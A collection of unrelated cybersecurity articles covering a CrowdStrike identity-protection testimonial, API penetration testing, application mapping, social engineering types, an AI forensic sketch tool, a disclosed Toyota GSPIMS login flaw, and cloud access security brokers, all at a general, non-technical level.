With Falcon Complete, the CISO gets CrowdStrike Falcon® Identity Threat Protection to stop identity-based attacks, both through services performed by CrowdStrike and via work done by his security operations center (SOC) team.
Check out this live attack and defend demo by the Falcon Complete team to see Falcon Identity Threat Protection in action.
Below are nine use cases for the identity protection capability, in his own words.
1. We receive executive-level key metrics on identity risks. Falcon Identity Threat Protection provides us immediate value with real-time metrics on total compromised passwords, stale accounts and privileged accounts. As these numbers decrease, our risk and expenditures drop as well, allowing us to prove the value of our cybersecurity investments to stakeholders.
2. We get powerful policies and analytics. Falcon Identity Threat Protection helped us move away from reactive, once-a-year privileged account analysis to proactive real-time analysis of all of our identities, including protocol usage such as Remote Desktop Protocol (RDP) to DCs/critical servers. Many attacks leverage compromised stale accounts, and with Falcon Identity Threat Protection we can monitor and be alerted to stale accounts that become active.
3. We can stop malicious authentications. With Falcon Identity Threat Protection, we can enforce frictionless, risk-based multifactor authentication (MFA) when a privileged user remotely connects to a server — stopping adversaries trying to move laterally. Additionally, we can define policies to reset passwords or block/challenge an authentication from stale or high-risk accounts.
“I’ve bought a lot of cyber tools. My analysts unanimously thanked me the day we bought CrowdStrike.”
4. We can alert system admins to critical issues. Adversaries often target critical accounts. Instead of simply alerting the security team, Falcon Identity Threat Protection allows us to flag critical accounts with specific policies and alerts that can be sent directly to the account owner. For example, the owner of a critical admin account for our organization’s financial systems can be alerted to anomalous behavior around that account, eliminating the need for the security team to reach out to her for every alert.
5.We can investigate behavior and hygiene issues. When reviewing RDP sessions from the last 24 hours, we noticed a former employee, Steve Smith (names changed), remotely accessing a server in our environment from Jane Doe’s computer. Upon investigation, we found Jane Doe was legitimately using Steve Smith’s credentials to perform business functions that Steve was no longer around to perform. We immediately tied Jane’s account to Steve’s to trigger MFA for any authentication. We also reviewed Steve’s permissions and noticed he had extensive local administrator privileges to over 600 computers, which we were able to remove instantly.
6. We can eliminate attack paths to critical accounts. It takes only one user’s credentials to compromise your organization. In previous phishing campaigns that asked users to reset their passwords, 7% of our employees entered their username and password into a fake Microsoft login screen. Falcon Identity Threat Protection shows us how one username and password dump from a single machine can lead to the compromise of a highly privileged account, allowing for full, unfettered access to an enterprise network. We now have the ability to visualize how a low-level account compromise can lead to a full-scale breach.
“Within two hours of deploying Falcon Identity Threat Protection, we identified 10 privileged accounts with compromised passwords and began resetting them immediately.”
7. We gain awareness of AD incidents. With Falcon Identity Threat Protection, we can now see credential scanning and password attacks on all of our external-facing systems that link to our Microsoft AD and Azure AD logins.
8.We can verify if lockouts are actually malicious. Every day, we face a handful of account lockouts, mostly due to users forgetting their passwords or a system that continues to authenticate after the user has reset their password. With Falcon Identity Threat Protection, we can see all account lockouts and failed authentications, allowing us to immediately understand why a lockout occurred and if malicious activity was involved.
9. We can correlate endpoint and identity activity. Once an alert fires off regarding a potentially misused identity, such as a stale account becoming active after 90+ days of inactivity, we can correlate this information with endpoint-related detections. We simply grab the hostname where the stale account became active, pivot to CrowdStrike Falcon® Insight XDR, and look for malicious activity and detections on a specific machine. Likewise, if a machine becomes infected, we can use Falcon Identity Threat Protection to investigate who has access to that machine and whether their behavior is normal. This integration is not only unique but essential with identity-based attacks.
“CrowdStrike not only revolutionized the way our SOC operates, it changed the way I sleep at night.”
API security is an undervalued but crucial aspect of information security. Some of the most common cyber attacks exploit APIs and web applications, and if organisations are to stay secure, they must test their systems to identify and eradicate weaknesses.
Organisations can achieve this with API penetration tests. An ethical hacker (or ‘penetration tester’) will examine your applications using the same techniques that a cyber criminal would use. This gives you a real-world insight into the way someone might compromise your systems.
Web application and API tests look specifically at security vulnerabilities introduced during the development or implementation of software or websites. There is no single checklist of how exactly the test should be conducted, but there are general guidelines.
Benefits of API penetration testing
The primary purpose of an API penetration test is to protect your organisation from data breaches. This is crucial given the increased risk of cyber attacks in recent years; according to a UK government report, 39% of surveyed organisations said they suffered a security breach in the past year.
By conducting an API penetration test, you will gain a real-world overview of one of the biggest security threats that organisations face. The tester will use their experience to provide guidance on specific risks and advise you on how to address them.
But penetration tests aren’t only about closing security vulnerabilities. Mitigating the risk of security incidents has several other benefits. For instance, you protect brand loyalty and corporate image by reducing the likelihood of a costly and potentially embarrassing incident.
Penetration testing also helps you demonstrate to clients and potential partners that you take cyber security seriously. This gives you a competitive advantage and could help you land higher-value contracts.
Perhaps most notably, penetration testing is a requirement for several laws and regulations. Article 32 of the GDPR (General Data Protection Regulation), for example, mandates that organisations regularly test and evaluate the effectiveness of their technical and organisational measures employed to protect personal data.
Likewise, if your organisation is subject to the PCI DSS (Payment Card Industry Data Security Standard), you must conduct external penetration tests at least once per year and after any significant changes are made to your systems.
API penetration testing checklist
IT Governance has its own proprietary checklist when conducting API and web application penetration tests.
The system is modelled on the OSSTMM (Open Source Security Testing Methodology Manual) and the OWASP (Open Web Application Security Project) methodologies.
A high-level overview of our process is outlined below, with a brief description of what is assessed during each section.
1. Authentication
The penetration tester ensures that appropriate mechanisms are in place to confirm a user’s identity. They then review how the authentication process works, using that information to circumvent the authentication mechanism.
2. Authorisation
The tester verifies that access to resources is provided only to those permitted to use them.
Once roles and privileges are understood, the tester attempts to bypass the authorisation schema, finding path-traversal vulnerabilities and ways to escalate the privileges assigned to the tester’s user role.
3. Session management
The tester ensures that effective session management configurations are implemented. This broadly covers anything from how user authentication is performed to what happens when logging out.
4. Input validation and sanitisation
The tester checks that the application appropriately validates and sanitises all input from the user or the environment before using it.
This includes checking common input validation vulnerabilities such as cross-site scripting and SQL injection, as well as other checks such as file uploads, antivirus detection and file download weaknesses.
5. Server configuration
The tester analyses the deployed configuration of the server that hosts the web application. They then verify that the application server has gone through an appropriate hardening process.
6. Encryption
The tester assesses encryption security around the transmission of communication. This includes checking for common weaknesses in SSL/TLS configurations and verifying that all sensitive data is being securely transferred.
7. Information leakage
The tester reviews the application configuration to ensure that information is not being leaked.
This is assessed by reviewing configurations and examining how the application communicates to discover any information disclosure that could cause a security risk.
8. Application workflow
The tester determines whether the application processes and workflows can be bypassed.
Tests are conducted to ensure that application workflows cannot be bypassed by either tampering with the parameters or forcefully browsing. This ensures the integrity of the data.
9. Application logic
The tester analyses how the application uses, stores and maintains data. They do this by checking the underlying technology and any mitigating controls that may affect the risk to the application.
10. Report
The tester documents their findings. Their reports contains an executive summary, which provides a high-level, non-technical summary of any identified vulnerabilities, alongside a summary of the organisation’s business risks and an overall risk rating.
It also contains a comprehensive review of testing details, such as the scope of the assessment, descriptions of the vulnerabilities identified and their impact, plus proofs of concept that support the findings.
Finally, the report provides the tester’s commentary, where they discuss the issues identified and how the vulnerabilities could be linked within an attack chain. This is supplemented with remediation advice and supporting references.
Application security refers to the measures taken to protect the confidentiality, integrity, and availability of an application and its associated data. This involves designing, developing, and deploying applications in a secure manner and protecting them against threats such as hacking, malware, and data theft. It also involves the use of application security testing tools, as well as ongoing monitoring and management to detect and respond to security incidents.
Application security aims to prevent unauthorized access to an application and its data, and to ensure the privacy and security of sensitive information processed by the application. This is essential for organizations to maintain the trust of their customers, partners, and stakeholders, and to comply with industry regulations and standards.
What Is Application Mapping?
Application mapping is the process of creating a visual representation of the components, relationships, and interactions of a software application. It helps to identify potential security vulnerabilities and areas of risk, and can be used to support security testing, incident response, and overall application security planning.
Application mapping can be performed manually or with the use of automated tools and typically includes a diagram that shows the various components of the application, such as the user interface, database, and server, and how they interact with each other. This information can be used to create a comprehensive understanding of the application architecture and to develop and implement effective security controls.
How Application Mapping Can Boost Application Security
Application mapping can boost application security by providing a comprehensive understanding of the application’s architecture, data flow, and interactions between components. This information can be used to identify potential security risks and vulnerabilities and to implement appropriate application security measures to mitigate these risks. Here are some specific ways that application mapping can boost application security:
Identification of sensitive data: By creating a visual representation of the flow of data within an application, application mapping can help to identify sensitive data and the components that handle this data. This information can be used to ensure that sensitive data is properly protected and that the appropriate security measures are in place to secure the data.
Improved threat modeling: Threat modeling is the process of identifying potential security risks and vulnerabilities within an application. Application mapping can provide a clear understanding of the application’s architecture, components, and data flow, making it easier to identify potential security risks and vulnerabilities.
Better access control: Application mapping can be used to identify the relationships between different components and to understand the flow of data within the application. This information can be used to implement better access controls, such as role-based access controls, to ensure that sensitive data is only accessible by authorized users.
Improved network segmentation: By creating a visual representation of the application’s architecture and data flow, application mapping can be used to identify the components that are communicating with each other and the flow of data between these components. This information can be used to improve network segmentation and to ensure that sensitive data is only accessible by authorized components.
Better incident response: In the event of a security incident, application mapping can provide a clear understanding of the application’s architecture and data flow, making it easier to respond to the incident and restore the application to a secure state.
Application Mapping Best Practices
Recognize All Types of Dependencies
Identifying all types of dependencies is a crucial step in the application mapping process. Dependencies between components can greatly impact the security of an application, so it is important to understand all of these relationships. There are three types of dependencies that should be recognized in application mapping:
Functional dependencies: These describe the relationships between components that perform specific functions. For example, a user interface component may depend on a database component to store and retrieve data. By recognizing functional dependencies, organizations can understand how changes to one component can impact the overall functionality of the application.
Data dependencies: These describe the relationships between components that exchange data. For example, an application component may receive data from an external source, such as a web service, and pass that data to another component for processing. By recognizing data dependencies, organizations can understand how sensitive data flows through the application and identify areas where data may be vulnerable to attack.
Security dependencies: These describe the relationships between security controls and the components they protect. For example, a firewall may protect an application server, or encryption may protect sensitive data in transit. By recognizing security dependencies, organizations can understand the overall security posture of the application and identify areas where security controls may be insufficient or missing.
Actively Avoid Dependencies When Possible
By reducing the number of dependencies between components, organizations can minimize the attack surface and simplify security management. Here are a few ways that dependencies can be reduced:
Removing unnecessary components: Unnecessary components can increase the attack surface and the complexity of security management. By removing these components, organizations can reduce the number of dependencies and simplify the application architecture.
Limiting access to components: Limiting access to components, such as by restricting network access or implementing access controls, can reduce the number of dependencies and minimize the attack surface. For example, by limiting access to a database component to only the components that need to access it, organizations can reduce the number of potential attack vectors.
Simplifying interactions between components: Complex interactions between components can increase the risk of security vulnerabilities and make it more difficult to manage security. By simplifying these interactions, organizations can reduce the number of dependencies and improve the overall security of the application.
Strive To Test Everything
Testing all components and interactions represented in the application map is essential to identify security vulnerabilities and ensure that they are addressed. Here are a few reasons why comprehensive testing is important:
Prioritize testing efforts: Application mapping provides a roadmap for comprehensive security testing, which can be used to prioritize testing efforts and ensure that all areas of the application are tested. This can help organizations focus their testing efforts on the most critical components and interactions.
Identify vulnerabilities: By testing all components and interactions, organizations can identify security vulnerabilities that may otherwise be overlooked. This can include vulnerabilities in the functionality of individual components, the interactions between components, and the security controls that protect them.
Address vulnerabilities before exploitation: Comprehensive testing can help organizations identify and remediate security vulnerabilities before they can be exploited. This can reduce the risk of a successful attack and improve the overall security posture of the application.
Ensure the security of the entire application: Testing individual components may not be enough to ensure the security of the entire application. By testing everything, organizations can understand how all components and interactions work together and identify potential security vulnerabilities in the overall architecture.
Periodically Update Your Map
Periodically updating your application map is a best practice that helps ensure the security of an application. Regularly updating the map ensures that it remains accurate and up-to-date, which is essential for effective security management. Here are a few reasons why periodic updates are important:
Reflect changes in the application: Applications change over time, and regular updates to the map help ensure that these changes are accurately reflected. For example, new components may be added, existing components may be updated, or relationships between components may change. Keeping the map up-to-date helps organizations understand the impact of these changes on the security of the application.
Identify new dependencies: As the application evolves, new dependencies may be introduced that need to be recognized and managed. By regularly updating the map, organizations can identify these new dependencies and understand how they impact the security of the application.
Stay ahead of threats: Threats to the security of an application are constantly changing, and regular updates to the map help organizations stay ahead of these threats. By understanding how changes in the application and new threats may impact the security of the application, organizations can take proactive steps to mitigate risk.
Improve security management: Periodic updates to the application map can help organizations improve the efficiency and effectiveness of security management. By keeping the map up-to-date, organizations can ensure that security efforts are focused on the right areas and that the overall security posture of the application is strong.
Conclusion
In conclusion, application mapping is a powerful tool that can significantly boost the security of applications. By creating a detailed map of the components and interactions within an application, organizations can gain a better understanding of their security posture and identify potential vulnerabilities.
By following the best practices in this article, organizations can proactively mitigate risk and improve the efficiency and effectiveness of their security management efforts. In today’s increasingly connected and complex technological landscape, the importance of application security cannot be overstated, and application mapping can play a critical role in ensuring the security and protection of sensitive information and data.
Social Engineering is a technique that is performed by cybercriminals who indulge in exploiting human weaknesses. The act of Social Engineering involves various techniques all of which involve the manipulation of human psychology.
Threat actors rely especially on Social Engineering in order to easily gain sensitive information from victims. Social engineering attack depends on building trust with the victim so that he never suspects in giving out his/her personal information such as phone numbers, passwords, social security number, etc.,
This technique is proved to have been the most successful one when it comes to hacking into an organization’s network. Hackers can disguise themselves as an IT audit person or an external network administrator and easily gain access inside a building without suspicion. Once they are inside an organization, they follow various other social engineering techniques to compromise their network.
One of the greatest weaknesses, an organization can possess is the lack of information security knowledge with its employees. This lack of knowledge in cybersecurity gives a great advantage for hackers to perform attacks causing data breaches in the organization.
Social Engineering attack Types
There are lots of social engineering attacks that can be used by threat actors. Some of them are,
1. Phishing 2. Vishing 3. Spoofing 4. Tailgating 5. Quid pro quo 6. Baiting
1. Phishing
Phishing is the most simple and effective attack a hacker can use to steal credentials like username, password, social security number, organization secrets, or credit card details. Sometimes phishing is also used to spread malware inside a network. In general, Phishing involves Social engineering as well as Spoofing
2. Vishing
Vishing is similar to phishing, which involves calling the victim and pretending as a legitimate caller. Once the victim believes without suspicion, it will be easy for the hacker to gain sensitive information such as network structure, employee details, company account details etc.,
3. Spoofing
Spoofing is a type of attack where, “what we see will look like it, but it is not”.In terms of Cyber Security, Spoofing is nothing but disguising as a legitimate source in order to gain sensitive information or to gain access to something. An attacker can trick us into believing that he is from the original source by spoofing.
4. Tailgating
Tailgating or piggybacking is a technique followed by threat actors to enter an organization building. During this attack, the threat actors wait for an employee/ a person to enter inside a place where the access for outsiders is restricted and follow them inside the building once they use their access cards or access key to open the door.
5. Quid pro quo
Quid pro quo in Latin means “a favor for a favor”. In this case, the hacker communicates with an employee of a company and offer them a deal. Either money in exchange for information or anything the employee would wish.
In most cases, money is the main motto. Hackers communicate with a present employee or an ex-employee and ask to give away sensitive information such as administrator privilege, administrator password, network structure, or any other data they require in exchange of the employee’s wish.
Hackers convince the employees to give away the information by making a personal deal with them. This is considered one of the serious threats in an organization because the information is given away intentionally by an employee.
6. Baiting
As the word describes, hackers create baits such as USB flash drives, CD-ROM’s, Floppy disk or Card readers.
They create folders inside the devices such as Projects, revised Payrolls of the organization and drop them in sensitive areas(Elevators, Rest Rooms, Cafeterias or Parking lots) where employees would keep it usually.
Once an employee picks up and inserts the USB in their computer, the script inside the device runs and gives full control to the hackers. This method of Social Engineering is called as Baiting.
Police forensics is already plagued by human biases. Experts say AI will make it even worse.
Two developers have used OpenAI’s DALL-E 2 image generation model to create a forensic sketch program that can create “hyper-realistic” police sketches of a suspect based on user inputs.
The program, called Forensic Sketch AI-rtist, was created by developers Artur Fortunato and Filipe Reynaud as part of a hackathon in December 2022. The developers wrote that the program’s purpose is to cut down the time it usually takes to draw a suspect of a crime, which is “around two to three hours,” according to a presentation uploaded to the internet.
“We haven’t released the product yet, so we don’t have any active users at the moment, Fortunato and Reynaud told Motherboard in a joint email. “At this stage, we are still trying to validate if this project would be viable to use in a real world scenario or not. For this, we’re planning on reaching out to police departments in order to have input data that we can test this on.”
AI ethicists and researchers told Motherboard that the use of generative AI in police forensics is incredibly dangerous, with the potential to worsen existing racial and gender biases that appear in initial witness descriptions.
“The problem with traditional forensic sketches is not that they take time to produce (which seems to be the only problem that this AI forensic sketch program is trying to solve). The problem is that any forensic sketch is already subject to human biases and the frailty of human memory,” Jennifer Lynch, the Surveillance Litigation Director of the Electronic Frontier Foundation, told Motherboard. “AI can’t fix those human problems, and this particular program will likely make them worse through its very design.”
The program asks users to provide information either through a template that asks for gender, skin color, eyebrows, nose, beard, age, hair, eyes, and jaw descriptions or through the open description feature, in which users can type any description they have of the suspect. Then, users can click “generate profile,” which sends the descriptions to DALL-E 2 and produces an AI-generated portrait.
The Global Supplier Preparation Information Management System, or GSPIMS, of Toyota, was breached by a security researcher using a backdoor. After 90 days, the hacker dutifully alerted the company about the breach.
The firm’s web platform, known as GSPIMS, enables employees and suppliers to remotely log in and manage the company’s extensive supply chain. It is an Angular single-page application. Based on a license key embedded in the app for AG Grid, it was created by SHI International Corp – USA on behalf of Toyota.
“I discovered what was essentially a backdoor login mechanism in the Toyota GSPIMS website/application that allowed me to log in as any corporate Toyota user or supplier just by knowing their email”, a security specialist who blogs under the pseudonym EatonWorks.
He eventually found the email address of the system administrator and was able to access their account. He says “I had full control over the entire global system”.
Also, he had complete access to all internal Toyota projects, data, and user accounts, including those of Toyota’s partners and suppliers from outside the company.
On November 3, 2022, Toyota was properly informed of the issues, and by November 23, 2022, the firm had verified they had been resolved.
Specifics of the Toyota’s Breach
The researcher made the decision to investigate any potential threats concealed behind the login screen.
He had to modify the JavaScript code to get beyond the login screen. Here, developers may control who has access to particular pages by utilizing the Angular framework, which will return true or false.
Patching the Angular functions
Researcher explains that patching the JavaScript was all that was needed to achieve full access since their API was improperly secured.
In GSPIMS’ case, no data would load from the API. All the endpoints would return HTTP status 401 – Unauthorized responses due to the missing login cookie.
“Toyota/SHI had seemingly secured their API correctly, and at this point, I was about to write this site off as “probably secure”. I don’t bother reporting single-page-application bypasses unless it also exposes a leaky/improperly secured API”, says the researcher.
Further, the analyst rapidly realized that the service was creating a JSON Web Token (JWT) based on the user’s email address for password-less login. Therefore, someone may create a valid JWT if they were able to guess a genuine email address of a Toyota employee.
“I had discovered a way to generate a valid JWT for any Toyota employee or supplier registered in GSPIMS, completely bypassing the various corporate login flows, which probably also enforce two-factor authentication options”, the researcher.
Acquiring a valid JWT
Then the researcher was trying to locate a user who had the System Admin position and came across another API endpoint called findByEmail that only required a valid email to return data on a user’s account. Conveniently, this also identifies the managers of the user.
This gave him access to the User Administration section. He poked around more and found users with even higher access, such as Supplier Admin, Global Admin, and finally, System Admin.
A GSPIMS system administrator has access to private data, including 14,000 user profiles, project schedules, supplier rankings, and classified documents.
Internal Toyota documents
Researcher said Toyota prevented what may have been a disastrous leak of information about both their partners’ and suppliers’ employees as well. It was possible to make embarrassing internal remarks and supplier rankings public.
Because cyberattacks on Toyota and its suppliers have previously occurred, another one was quite likely.
A cloud access security broker is a security policy enforcement point that can be located on-premises or in the cloud. Its purpose is to aggregate and implement an enterprise’s security policies whenever cloud-based resources are accessed.
The cloud access security broker is analogous to a security guard in that it ensures compliance with the laws that were established by the administrators of the cloud service.
A cloud access security broker is a security solution that enables businesses to protect both their data and their users while they are working in the cloud. It functions as a middleman between an organization’s IT infrastructure and the company’s cloud services, monitoring and limiting access to ensure that security policies are adhered to.
Increasing companies’ utilization of cloud-based services is one of the primary factors contributing to the growing demand for cloud access security brokers. As more and more businesses move their data and applications to the cloud, which is very simple to use and manage, these businesses require a method to secure their assets and protect themselves against potential threats that may arise as a result of services being connected to one another without having a great deal of control over them.
Cloud access security brokers offer a means to monitor and regulate access to cloud services, thereby guaranteeing that only authorized users can view sensitive data.
Cloud Access Security Broker for Data Protection: How It Can Be Achieved
Cloud access security brokers can also assist enterprises in complying with regulatory regulations and industry standards like HIPAA, PCI-DSS, and SOC 2, amongst others. Furthermore, as they carry out a substantial amount of detailed reporting for data breaches, they are able to undertake data encryption and can even manage access controls. As a result, the business is carrying out these procedures in an effective manner. So it can be used for cloud data security in a number of ways.
Using Cloud Access Security Brokers for Data Loss Prevention
After being implemented, cloud access security brokers are able to perform monitoring of the resources that have been created or deployed. They can also be used to enforce access restrictions on such resources, which effectively guarantees that only authorized people who have the authorization to access them can access that sensitive data. This not only protects against unauthorized access but also prevents sensitive data from being accidentally deleted.
Performing Data Encryption
Cloud access security broker protects data in a variety of ways, including through the implementation of appropriate access restrictions. Cloud access security brokers have the ability to encrypt sensitive data while it is both at rest and in motion.
If the data is encrypted, then even if someone gains unauthorized access to the data or if the data itself is stolen, it cannot be decoded without the appropriate decryption keys even if the data was encrypted. As a result, it renders it possible to gain access to the data even after having performed access that was not authorized.
Managing proper compliance
Because cloud access security brokers are responsible for the enforcement of a wide variety of policies, they can be of assistance in achieving various kinds of compliance. Cloud access security brokers are able to assist firms in meeting regulatory requirements and industry standards, such as HIPAA, PCI-DSS, and SOC 2, which may be applicable.
Cloud access security brokers are essentially reporting and alerting systems that give organizations information about potential security breaches. This enables organizations to take action to secure their data swiftly.
The Four Pillars of a Cloud Access Security Broker
Cloud access security brokers are built on four distinct pillars, each of which not only assists an organization in meeting appropriate data encryption standards but also provides a means by which the users of that organization can be protected. Cloud access security brokers offer visibility into the utilization of cloud services across an entire organization. This visibility includes information about which services are being utilized, who is using them, and the kind of data that is being saved or accessed. This offers an organization a sufficient level of visibility of its resources.
By providing extensive reporting and notifications on potential security breaches, cloud access security brokers are able to assist organizations in meeting regulatory obligations and industry standards.
The prevention of data loss, encryption, access restriction, and activity monitoring are only some of the security measures that can be enforced by cloud access security brokers in order to secure data and users in the cloud. In addition to this, they offer governance capabilities for their customers, such as policy management, incident response, and risk management, to assist businesses in managing and securing their cloud environments.
Conclusion
Cloud access security brokers safeguard cloud data. They monitor and control data and application access to secure cloud services. By monitoring and controlling cloud usage, they assist enterprises to meet regulatory and industry standards.
Cloud access security brokers can identify and mitigate threats to prevent data breaches and other security problems. They also offer encryption, data loss prevention, and threat detection. These solutions benefit all businesses, especially cloud-dependent ones. They should be utilized with firewalls, intrusion detection systems, and antivirus software as part of a holistic security plan.
